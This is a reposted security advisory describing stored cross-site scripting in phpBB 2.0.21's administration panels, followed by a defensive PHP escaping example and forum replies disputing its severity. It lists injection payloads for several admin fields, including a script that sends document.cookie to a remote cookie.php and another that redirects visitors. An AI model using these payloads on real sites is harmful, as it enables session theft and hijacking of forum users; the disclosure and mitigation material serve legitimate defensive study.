phpBB 2.0.21 XSS in administration
**********************************
//-- By Blwood [renatrix@gmail.com]
//-- [ http://www.blwood.net ]
//--
Style Admin
-----------
Management & Create a theme
Lots of inputs are not properly filtered, like style_name, head_stylesheet, body_background, tr_color1_name (all the inputs with simple names)...
We can of course inject HTML this way: "><h1>Owned by Blwood :P</h1>
but it's more interesting to inject JavaScript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...
When an admin goes into Style Administration he will be owned. (inject in style_name)
When an admin edits a theme he will be owned.
Group Administration
--------------------
Management
Input group_description is not correctly filtered; we can inject JS like this: "><script>alert('Owned by Blwood')</script> or </textarea>"><script>alert('Owned by Blwood')</script>
When an admin goes into Group Administration he'll be owned. But what's more, the groups can be seen in groupcp.php
by every visitor.
An exploit could be:
</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>
Ranks
-----
Rank Administration
Rank Title (input title) is not correctly filtered; we can inject JS like: "><script>alert('xss')</script>
But what's interesting: if you give this rank to a user, the rank will appear in the user's topics and the code will be executed when someone views a topic :)
Now you can inject what you want, but a maximum of 40 characters...
Smilies
-------
Smiley Editing Utility
Smiley Code : "><body onload="alert('Owned by Blwood')">
Configuration
-------------
General Configuration
Inputs are not correctly filtered. Ex: allow_html_tags => "><script>alert('Owned by Blwood')</script>
[ Video ]
http://www.blwood.net/advisory/phpbb2021xssadmin.rar
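As an added illustration (not phpBB's code and not part of Blwood's advisory): a minimal PHP rendering of the two form contexts the advisory names, the style_name text input and the group_description textarea, first concatenated unescaped as the advisory describes, then escaped on output with htmlspecialchars, which keeps these payloads literal. The render functions and the breaks_out check are assumptions for the demo; the field names mirror the advisory.

```php
<?php
// Added example, not phpBB's code. Field names mirror the advisory; the
// render functions are hypothetical stand-ins for a template.

// Payloads quoted from the advisory above, as they would sit in the database.
$style_name        = '"><body onload="alert(\'Owned by Blwood\')">';
$group_description = '</textarea>"><script>alert(\'Owned by Blwood\')</script>';

// Vulnerable rendering: the stored value is concatenated straight into HTML.
// A " closes the attribute and a </textarea> closes the element, so the rest
// of the payload becomes live markup on the admin page (or on groupcp.php).
function render_unsafe(string $style_name, string $group_description): string
{
    return '<input type="text" name="style_name" value="' . $style_name . '">' . "\n"
         . '<textarea name="group_description">' . $group_description . '</textarea>';
}

// Hardened rendering: escape on output for the HTML context in use.
// ENT_QUOTES turns " and ' into entities so nothing can leave the attribute;
// < and > become &lt; and &gt; so </textarea> stays literal text.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML401, 'UTF-8');
}

function render_safe(string $style_name, string $group_description): string
{
    return '<input type="text" name="style_name" value="' . esc($style_name) . '">' . "\n"
         . '<textarea name="group_description">' . esc($group_description) . '</textarea>';
}

// Reviewer check: true if the markup contains any tag other than the two
// the template itself emits, i.e. if a stored value broke out of its context.
function breaks_out(string $html): bool
{
    return preg_match('#<(?!/?(input|textarea)\b)#i', $html) === 1;
}

echo "--- unsafe ---\n", render_unsafe($style_name, $group_description), "\n";
echo "--- safe ---\n",   render_safe($style_name, $group_description), "\n";

var_dump(breaks_out(render_unsafe($style_name, $group_description)));
var_dump(breaks_out(render_safe($style_name, $group_description)));
```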
WOW, what a dumb guy in that video. He didn't discover any XSS; administrators can put JavaScript and HTML wherever they want in the forum. Some people don't deserve the air they breathe. What he did is the same as going and owning your own site, because you'd have to have the admin password to do it. Simply ridiculous...
Man,
He wanted to show how you can mess with the admin, he he he
Getting into the admin panel is up to you

See you
Yeah man, but going from that to saying "I discovered an XSS in phpBB 2.0.21" and "(input) is not correctly filtrated"... you can do that not only in phpBB but in almost any forum...
Quote:
    When an admin goes into Style Administration he will be owned. (inject in style_name)
    When an admin edits a theme he will be owned.
He says, "When an admin edits this he will be owned"; I wonder how, with a message box left by another admin saying "Owned by Blwood".
This is like those vulnerabilities guys find every now and then in cPanel or WHM: what good is a vuln that only the system admin has the power to exploit...
I went to look at the guy's site, blwood.net: 10 Perl tutorials teaching printf...
But you did well to bring this over here...